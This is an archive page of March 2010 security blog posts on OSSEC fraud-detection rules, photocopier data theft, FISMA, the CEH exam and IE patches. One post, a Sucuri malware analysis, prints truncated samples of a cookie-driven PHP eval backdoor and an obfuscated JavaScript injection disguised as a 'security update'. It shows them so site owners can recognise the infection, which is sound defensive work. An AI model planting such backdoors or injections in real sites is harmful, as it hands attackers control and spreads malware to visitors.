From the monthly archives:

March 2010

Detecting Fraud with OSSEC

by Xavier on March 31, 2010

in SBN

Fraud For a while, it looks that “Fraud detection” is a hot-topic for many SIEM vendors (“Security Information and Event Management“). Recent presentations or webcasts I attended had always some time dedicated to “fraud”! The vendors can’t be blamed to find new opportunities to sell their products. Today they are solutions which work quite well at detecting common security incidents. Wikipedia defines a fraud as “an intentional deception made for personal gain or to damage another individual;“. Detecting fraudulent activities is difficult due to their nature: they are based on simple actions and they are hidden in the huge flow of events generated daily by your devices and applications.

If you read my blog, you probably noticed that OSSEC became a recurrent topic for a few weeks. Like I said above, I’m involved in SIEM projects based on commercial products and I find the available  tools fascinating to extract the real value from events! Users activity generates events which are already collected by OSSEC. So why not try to detect fraud with a free solution? They’re many types of frauds (banking, telecommunications, Internet, etc) but I’ll base my example on user accounts fraud.

The scenario: An organization maintains a portal, based on Apache, delivering business information related to the Belgium market. All users received  personal credentials. The goal is to detect fraudulent login usage. If one of those conditions is met, OSSEC will generate an alert:

  • If a login is used from a country outside Belgium
  • If a login is used from multiple countries within a small period of time (< time to travel)
  • If a login is used from multiple subnets within a small period of time

The implementation of a fraud detection mechanism starts with a white page and some brainstorming: How to translate a fraudulent behavior into rules and triggers? In the examples given above, let’s focus on the second one: detecting a login used across multiple countries during a small period of time. The user’s IP address will be converted to a country name (via geo-localization). And a delta of time will be computed between each access on the website for a same login (We will assume that one day may occur between accesses from two different countries). At OSSEC level, those operations will be performed by an active-response script. The following figure will give you an overview of the solution:

OSSEC Fraud Path

(Click to enlarge)

  1. Apache logs (webaccess) is collected by OSSEC and events created.
  2. If the event matches our criteria, we will trigger an active-response script to detect of the event looks like fraudulent (without logging or alerting on the original event).
  3. If yes, we create a new type of event (“fraud”).
  4. The fraud events are parsed and processed by OSSEC.
  5. Alerts will be generated.

How to implement this? I’ll assume that your OSSEC server is already configured and processing Apache logs. For details about the installation or deployment of OSSEC, have a look at the documentation.

Apache Parser Update

We need to track users authenticated by the Apache server. To achieve this, we need to change the “web-accesslog” decoder to fill the variable “user” with the right value. Backup your decoder.xml and change the existing decoder like this:

<decoder name="web-accesslog">
  <type>web-log</type>
  <prematch>^\d+.\d+.\d+.\d+ </prematch>
  <regex>^(\d+.\d+.\d+.\d+) \S+ (\S+) [\S+ \S\d+] </regex>
  <regex>"\w+ (\S+) HTTP\S+ (\d+) </regex>
  <order>srcip, user, url, id</order>
</decoder>

Local Rule Creation

A new “accesslog” rule will be created in the “local_rules.xml” configuration file:

<!-- Put your suspicious users here -->
<var name="WEB_USERS">^mary$|^john$|^sam$</var>

<group name="web,accesslog,">
  <rule id="50000" level="5">
    <if_sid>31100</if_sid>
    <regex>\d+.\d+.\d+.\d+ - \w+</regex>
    <user>$WEB_USERS</user>
    <description>Authenticated web access</description>
  </rule>
</group> <!-- WEB,ACCESSLOG -->

To reduce the server load, I’m using a variable “WEB_USERS” with all the suspicious logins. Only events matching one of those users will be processed. If you want to reduce even more the matches (and the server load), you can restrict to some URL only. The newly created rule will never generate an alert nor a log entry. To achieve this, set the right rule level (here “5″) or use the option “no_email_alert, no_log”.

Active-Response Configuration

An active-response configuration must be added into the main OSSEC configuration file:

<command>
  <name>web-locate</name>
  <executable>web-locate.sh</executable>
  <expect>srcip,user</expect>
</command>

<active-response>
  <!-- Perform GeoIP localisation for any authenticated web user
    -->
  <command>web-locate</command>
  <location>server</location>
  <rules_id>50000</rules_id>
</active-response>

This configuration defines a new script (“web-locate.sh“) will be triggered by any event matching the rule ID 50000.

Geo-localization Script

Basically, the script “web-locate.sh” does the following:

  • It reads the current login information (timestamp, IP address, country) from the filesystem
  • It performs the geolocalization of the current IP address (using geoiplookup)
  • If the countries differ, it substracts the new and old time:
    • If less than 1 day occurred, an alert is generated.
    • A line is written in a new logfile (/var/log/fraud.log)
  • New data are saved on the filesystem

Here is an example of event generated by the script:

[31-03-2010 21:33:18] Suspicious activity detected for user johndoe \
    via IP x.x.x.x in DE, Germany

The script is available here (provided “as is”). Feel free to re-use it.

Alert Configuration

The last step is to generate a new alert type from OSSEC. To achieve this, the main configuration will be modified to take care of the new log (using the type “syslog” – one event per line):

<localfile>
  <location>/var/log/fraud.log</location>
  <log_format>syslog</log_format>
</localfile>

And define the new alert via new rule in local_rules.xml:

<group name="local,syslog,">
  <rule id="50001" level="10">
    <match>Suspicious activity</match>
    <description>Fraud Detection</description>
  </rule>
</group> <!-- SYSLOG,LOCAL -->

Finally, restart your OSSEC. If one of your monitored logins will be used from different countries in less than 24 hours, alerts like the following example will be generated:

** Alert 1270065106.2956457: mail  - local,syslog,
2010 Mar 31 21:51:46 satanas->/var/log/fraud.log
Rule: 50001 (level 10) -> 'Fraud Detection'
Src IP: (none)
User: (none)
[31-03-2010 21:51:45] Suspicious activity detected for user johndoe \
    via IP x.x.x.x in DE, Germany

Nice isn’t it? The example presented here is quite simple. The ‘active-response’ feature of OSSEC  is great and can trigger powerful scripts which can perform deeper checks to detect suspicious activities on your network! Of course, keep in mind that forking a script per event could increase the CPU usage on your server (directly related to the EPS level of your infrastructure).

Beware of the photocopier as an Information Thief

by Ron Lepofsky on March 31, 2010

in SBN


“High- tech copy machines a gold mine for data thieves” was as story printed on March 18, 2010 in the Toronto Star, which should give pause to every one of us.  That is, everybody who uses a smart photocopier or who provides access to one for others.

You may think this is overreaction, but is it?

By smart photocopier, I mean one with a computer inside that provides all the great features.  The computer also has a disk, which indiscriminately retains images of sensitive and personal images like tax returns (social insurance numbers), job applications, and legal documents.

It also unwittingly retains images of critical information like executive summaries about corporate plans, new business strategies, and unpublished quarterly financial reports.

So everybody using a smart photocopier really needs to give some thought as to the consequences of their confidential material falling into the hands of those who would benefit from its unauthorized use for personal gain.  How could this happen? you think.  Well, lots of ways.

Someone such as a photocopier service person could simply copy the disk data.   Or someone with unauthorized access  to the machine at night.  If the copier has a data access port, anyone familiar with the data communications capabilities of the data port could walk by with their smart phone and download the data.

Twenty years ago I remember watching a news documentary describing a similar but lower tech use of photocopiers to steal sensitive and critical information.  Apparently during the cold war spies would insert a camera into a photocopier destined for the opposition’s embassy.  Then the “copier tech” would surreptitiously remove the film from the hidden camera in the photocopier and, of course,  replace it with more unused film.

So, without becoming paranoid about photocopiers, how can you get them to do you bidding with confidence that your sensitive and critical information will not fall into the hands of others?

Some simple things you can do are:

1. Always do your own photocopying whenever possible.

2. If you must use a copy service, then keep your eyes on your original documents and all copies of them, just as diligently as you would keep eye contact with your credit /debit card during a purchasing transaction.

3. Don’t use smart photocopiers unless you are sure of the security policy by which they are managed.

As the custodian of a smart photocopier, ensure your telecommunications and security people have configured it to:

a. Configure it to communicate only as mandated by your corporate security policy.

b. Implement an ongoing process to regularly scrub (rather than just “deleted”).

c. Implement an ongoing process to monitor the event logs of the copier and alert on suspicious activity such as unauthorized attempts to connect it to a telecommunications network, unauthorized attempts to communicate with its data port in order to upload data, and unauthorized attempts to open or tamper with the machine.

Prior to sending the copier off premises for service or for disposal, ensure the disk is either removed and destroyed or that data is scrubbed and destroyed completely.  Otherwise, you could end up with the same consequences as confidential data on a used and resold computer work station or laptop being retrieved by its new owner.

Of course we all know that there are dumb users even for smart photocopiers.  How many times have we all found original documents left by some previous users of the copy machine?  So it’s probably a good practice to count your original documents before and after using a photocopier.

Have a secure week.

Ron Lepofsky, B.A.SC. (Mech Eng), CISSP

President

ERE Information Security Auditors

www.ere-security.ca

www.ere-security.com

Former coworker Sacha Faust has published an entry on how the lack of handling relative urls when implementing URL redirection can lead to open redirector's. Article: http://blogs.msdn.com/sfaust/archive/2010/03/30/saferedirect.aspx

Half glass security

by Joseph Webster on March 31, 2010

in SBN

Your glass half empty, glass half full
I’d say you’ve got some catching up to do
Your glass half empty, glass half full
I’d say you’ve got some catching up to do
Best to impress, you win
Everything you do
Makes me wanna run
from Give Me What I Want by Kids In Glass Houses

The Security For All Half Glass award for unwarranted optimism and delusions of adequacy in security is awarded jointly to the New York Metropolitan Transportation Authority and the Department of Homeland Security E-Verify program. In the case of the MTA, this article in the New York Times sums up the reason for nomination.

While there were some conflicting witness accounts, the police believe the man who fatally stabbed two others with a knife during a subway brawl early Sunday morning fled the train at the Christopher Street station.

In an era of heightened security, when it seems as if virtually every step one takes in Lower Manhattan is captured on hidden camera somewhere, subway surveillance cameras might well have recorded the man leaving the station.

Except for one problem: the Christopher Street station has no cameras.

Moreover, nearly half of the subway system’s 4,313 security cameras that have been installed — in stations and tunnels throughout the system — do not work, because of either shoddy software or construction problems, say officials with the Metropolitan Transportation Authority, which operates the city’s bus, subway and train system.

More than eight years after the Sept. 11, 2001 attacks, the subway’s video surveillance system, one of the key tools the city has in deterring and investigating attacks of any and all kinds in the subways, remains a patchwork of lifeless cameras, unequipped stations and problem-plagued wiring.

And in the case of DHS E-Verify, this entry on the Homeland Security Newswire describes the reason for nomination thusly.

The U.S. government’s E-Verify program to detect illegal workers has an “inaccuracy rate” of about 54 percent, outside consultants have determined. An evaluation of E-Verify carried out for DHS by a Maryland firm found the program allows “many unauthorized workers” to obtain employment, the Wall Street Journal’s Louise Radofsky and Miriam Jordan reported.

Westat of Rockville, Maryland, said E-Verify is not able to confirm whether information workers are presenting is their own. As a result, Westat says, “many unauthorized workers obtain employment by committing identity fraud that cannot be detected by E-Verify.”

It put the inaccuracy rate for unauthorized workers at about 54 percent. Westat’s report, submitted to DHS in December, has received little public attention, the Journal’s writers said. UPI reports that all federal contractors are required to enroll in E-Verify within thirty days of being awarded a government contract. At least ten states use the system to check eligibility of state workers.

In the case of the subway surveillance cameras, only half of them work. And the E-Verify program has an “inaccuracy rate” of 54%. Hence the award. Let me revise the old idiom this way:

Optimists look at the glass half full
Pessimists look at the glass half empty.
Security looks at the wrong half of the glass.

You can see where this is going. As a security geek I can’t look at the subway cameras and say “they have 50% coverage” [optimist] or “they are 50% blind” [pessimist]. I can only say they are 100% unreliable. That’s right, when bad stuff goes undetected in half of a system that’s a fully unreliable system. By the same token, with the DHS E-Verify program you can’t say “they are 46% accurate” [optimist] or “they are 54% inaccurate” [pessimist] only that they are 100% unreliable.

So what’s the moral of these debacles? On the surface they might seem like classic Government funded Security Theater stories. And certainly they are that. But unlike many others, both of these programs had the potential of valuable side effects completely unrelated to their original intent. For the MTA subway surveillance cameras the side effect, which was illustrated nicely in the NYT article, is criminal prosecution and, assuming broad and reliable coverage, crime prevention. For the E-Verify system the best side effect would be that to actually implement such a system correctly you would need a reliable source of data – like say worker visa records – which doesn’t yet exist. So a reasonable person could infer that E-Verify would be dependent on immigration reform legislation that would establish just such a data source among other things. But guess what never happened. What did happen was a whole lot of funding for a whole lot of useless, badly designed security theater. Leaving us holding the bag and looking at the wrong half of the glass.


Lots of Italian sites getting hacked – Initial analysis

by http://sucuri.net on March 31, 2010

in SBN

On the last few days we are seeing a large number of reports from Italian sites getting hacked. Way more than the average and way more than from any other country. We got a chance to analyze a couple of them and they all look very much the same.

What is interesting is that we are seeing a wide range of sites, from Wordpress blogs, to Joomla-based ones and even simple HTML-only sites. Plus, they are hosted on a large variety of hosting companies, ruling out a shared-server compromise.


Analysis of the attack

All the sites we analyzed followed a similar pattern. First, a script mailcheck.php was added to the root directory of the site:
< ?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIl9kZSgk..'));
echo "checking email..."; ?>
If you decode this script by changing the "eval" for "echo", you can see what is it doing:

$ php mailcheck.php
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}checking email...
So the mailcheck.php is a backdoor that executes whatever command the attacker is giving.

Also, at the top of any index file they added the following:
< ?php ob_start('security_update'); function security_update($buffer){return $buffer.'< script
language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-
7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~
tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3e
..
;}//important security update ?>
They try to hide what they are doing with a "security_update" string at the start of it and an "important security update" comment at the end. Very clever... In fact, one of our clients saw that and didn't want to remove the code because he thought it was indeed an important update.

What this code does is just a malicious javascript that redirects and loads malware from a couple of other sites. This is what it looks like when I change the "eval" for "alert":



Here is the code a bit more organized:


Are you seeing issues like that on your site? If you are infected try removing those files and looking for strange entries on your index files. Also, my recommendation is that you revert back to a previous (and clean) backup or do a full scan on all your site to make sure there is nothing hidden in there. As always, you can contact us for help.

Want to read more stories like this one? Follow @sucuri_security on twitter or subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net.


Best password explaination I have seen yet..

by david on March 31, 2010

in SBN

John P. over at One Man’s Blog did a really great article on passwords, how to avoid weak ones and why you should be concerned with the strength of all of them. The only thing I would change would be putting the following parts of the article at the top, not towards the bottom, because I think this will make people want to read it:

Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?

Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network – after which time they will own you!

Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.

I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson.”

Head on over to One Man’s Blog and check the article out for yourself, it is well worth the read.



Why More Legislation Could Hurt FISMA Compliance

by Bryan Fish on March 31, 2010

in SBN

The US Government last week proposed updating the Federal Information Security Management Act (FISMA) to include a clause about the continuation and monitoring of security threats based on government agency risk profiles. The new amendments to the act would change FISMA compliance in the following ways:

  • Establish a national cyberspace division within the executive office of the President.
  • Establish a Cybersecurity Practice Board.
  • Focus on real-time threat monitoring to the federate IT infrastructure.
  • Build security into the procurement process.

Rep. Diane E. Watson from California argues in favor of this, partly because “…being compliant with current law does not equal adequate security…”.

She’s right - basing your entire security strategy on being compliant with a regulation is flawed.  Why?  Compliance mandates are written for the masses - it’s a broad stroke of the brush that outlines a minimum standard for its constituents.  This one-size-fits-all approach can’t possibly take into consideration the unique factors that influence your organization’s risk profile.

Although FISMA compliance mandates have come under fire recently, I don’t believe more legislation is the answer.  It’s our responsibility as security professionals to go beyond the compliance checklist.  We need to couple that with some good old-fashioned risk analysis, too.  But that doesn’t have to be hard.  Here’s a simple but effective way to approach risk management in your environment:

1. Identify the systems that matter most to your organization.  Start with your critical business applications, and make sure you understand the business information and processes that those applications support - that’s an easy way to derive a criticality rating for each application.  Applications are good starting points, but you’ll also want to map out the other risk exposure points in the system- databases, computers, data centers, even people & processes.

2. Think through the risk scenarios that you’re concerned about for each of those systems.  If it’s an Internet-facing Web application, it’s exposed to a different set of risks than an internal client-server application… which is different still from the risks posed by sensitive spreadsheets on remote laptops.  Consider these scenarios, and think about all of the bad things that could reasonably happen.  Your objective here isn’t to prove that the sky is falling, but rather to think through plausible scenarios and make sure you’re reasonably well-protected.

3. Make an honest evaluation as to whether you’ve done enough to mitigate the risk presented by those scenarios.  This is where your compliance efforts overlap your risk management work.  Many of the controls you’ve implemented for compliance also help you mitigate risk.  You may find, though, that the compliance-inspired controls don’t adequately mitigate the risk scenarios you’re most concerned about.  Implementing additional controls to address these areas take you beyond compliance and into true risk management.

Don’t get me wrong - I’m all for having compliance mandates evolve to address the changes and sophistication of security threats in the landscape.  But as security professionals, we can’t let compliance bodies do the thinking for us when it comes to risk management.

To read more on FISMA compliance, please visit Six Critical Elements to Achieve Economies in FISMA Compliance.

Certified Ethical Hacker and Training in General

by Billford on March 31, 2010

in SBN

I sat for the EC-council's Certified Ethical Hacker exam today. Mostly as part of a much larger experiment in finding some valid/useful training for my guys here. I just wanted to lay out some of my thoughts on this particular exam:


1) I will qualify this by saying I'm not one of these guys who thinks EVERYTHING should be in English. However, if you're going to build course material and an exam in English you should do everything you can to insure proper grammar and word choice. One incorrect placement of "NOT" or one wrongly spelled word can change the whole meaning of the question. This is a big problem with the CEH exam and prep material from EC-Council.

2) Some of the questions had no correct answers. Obviously I can't divulge any questions/answers here (stupid NDA) but if you happen to get them on the exam you'll immediately know what I mean. An offshoot of this is that some of one answer only questions had multiple correct answers. This is annoying and I think a bit intentionally misleading.

3) Quite a few of the tools on this exam I have never heard of. Not in any course material, reviews, prep exams or the 15 or so years I've been doing pen test/vulnerability assessment work. Some of this is my stubbornness and insistence on writing my own tools but even after Googling around for a few I find almost no mention of them. I'm not sure what the point of bringing up all these obscure tools was.

4) A few questions had an insane amount of useless detail. I don't actually care that Clive paid a lot of money for his computer, he should learn to shop better.

Some of the things I liked about it:

1) A good overview of regulation and laws (at least in the review material, the exam I took contained little of this).

2) A terrific treatment of testing processes and the various methodologies out there.

3) I liked quite a few of the scenarios and junior level people especially would benefit from thinking through them.


Overall I think it is worthwhile to have some folks go through this if only so they're speaking the same vocabulary and are familiar with some of the methodologies out there. It is my no means the most in-depth, technical certification I hold but it's definitely not the least either.

Fun Logging Webcasts: 4/1/2010 and 5/12/2010

by Dr Anton Chuvakin on March 31, 2010

in SBN

In the next few days, I will be doing two fun logging webcasts with The Open Group. Here is the info, quoted from their site:

Title: Enterprise Logging and Log Management: Hot Topics
Date & Time
: Thursday, April 1, 2010, 11:00am Eastern Time

Capturing log information is critical to IT organizations for many reasons, including for security incident detection and response, and for compliance with numerous regulations and standards. Join one of the foremost experts on log management, Dr. Anton Chuvakin, as we discuss enterprise logging challenges and issues.

Moderator: Jim Hietala, VP Security, The Open Group
Panelist: Dr. Anton Chuvakin, Security Warrior Consulting

To register and attend: https://opengroupevents.webex.com/opengroupevents/onstage/g.php?t=a&d=664303043

Title: Logging Use Cases and Standards Update
Date & Time
: Wednesday, May 12, 2010 11:00 am Eastern Time

Following on from our April 1 Log Management Challenges webcast, this second webcast will explore some log management use cases, including around accountability for data access. In addition, an update on progress in standards work from The Open Group (XDAS) and MITRE (CEE) will be presented.

Moderator: Jim Hietala, VP, Security, The Open Group
Panelists:

  • Ian Dobson, Director, Security & Jericho Forums, The Open Group
  • Dr. Anton Chuvakin, Security Warrior Consulting
  • Joel Winteregg, Netguardians

To register and attend:
https://opengroupevents.webex.com/mw0306l/mywebex/default.do?siteurl=opengroupevents&rnd=0.20892260101881588

 

Possibly related posts:


Microsoft, Security Pros Urge Action on IE Patches

by Secure Channel on March 31, 2010

in SBN

IE_browser_bandaid.jpgLeaping lizards, Microsoft yesterday once again jumped its own patch release cycle by releasing a cumulative fix for 10 Internet Explorer vulnerabilities, of which at least one is being hammered in the wild by hackers.

Microsoft circumvented its normal Patch Tuesday release because it was seeing an increasing number of attacks against the iepeers.dll vulnerability. According to Symantec, this vulnerability inserts an iFrame in the user’s browser session that redirects the user to a malicious Website. This security hole was initially reported March 9. The remaining vulnerabilities are presumably not being exploited at this time, and the fix is preventative.

The iepeers.dll vulnerability affects all versions of Internet Explorer, although versions of IE 6.0 and older are particularly at risk, security experts say. Microsoft had previously recommended workarounds in advisory KB981374 to mitigate the risk. Security experts say those workarounds should be disabled after the patch is applied to restore full functionality to IE.

Much of the Christian world will be celebrating Good Friday and Easter this weekend, which is raising an additional round of concerns for security pros. The Microsoft bulletin announcing the vulnerabilities will likely spur hackers into action and target businesses slow to update their browsers with the security fix.

“With any zero-day exploit that is being actively targeted, it is critical for administrators to patch their systems as soon as possible. Some patch maintenance cycles are scheduled over weekends to accommodate the known downtime. While many are planning for a long holiday weekend, administrators should not wait to patch this until next week as we know that hackers won’t be taking the weekend off,” said Jason Miller, Data and Security Team Manager at Shavlik Technologies, in a statement.
Updating IE implementations is a definite, but do patches such as these create new opportunities for security solution providers? Perhaps, depending on the customer’s interest and ability to execute.

A recent report by Beyond Trust, a provider of security access control and management tools, found that the vast majority of Microsoft vulnerabilities – including those affecting Internet Explorer – could be eliminated if administrator rights were revoked from endpoint machines. The Beyond Trust assertion is based on a study of the root causes of all the Microsoft security bulletins published and vulnerabilities disclosed in 2009. Removing administrator rights would mitigate 94 percent of the vulnerability exposures in all versions of IE and 100 percent of exposures in IE 8.0.

In its report, Beyond Trust writes:

“Microsoft does a commendable job of publicly disclosing detailed information about vulnerabilities and providing patches every month. However, software vulnerabilities take time to identify and due to complex corporate environments deploying patches take time to apply. It is during this period of time that exploits of unpatched or undiscovered vulnerabilities can damage a corporate network and gain access to sensitive information.

This report demonstrates the critical role that restricting administrator rights plays in protecting against vulnerabilities. It is important to note that this increased protection is achievable in one simple step without any impact on productivity — by implementing a desktop Privilege Identity Management solution.”

Of course, Beyond Trust – a company recently formed by the merger of Beyond Trust (Windows tools) and Symark (Unix tools) – wants solution providers to recommend and sell its products, and for customers to adopt its solutions. Beyond Trust says that revoking administrator rights isn’t practical, so a solution that regulates those rights is required. Perhaps, but policy controls and management set up by security solution providers could also provide a lower-cost solution.

The other thing that this out-of-band security bulletin demonstrates is Microsoft’s increasing willingness to short-circuit its patch release cycles with critical fixes that prevent the exploitation of dangerous vulnerabilities. If the security experts are correct, Microsoft is on target for a record year of out-of-band patch releases. Security solution providers could add rapid response services for advising customers on the priority of certain patches, as well as managing the patch deployment process.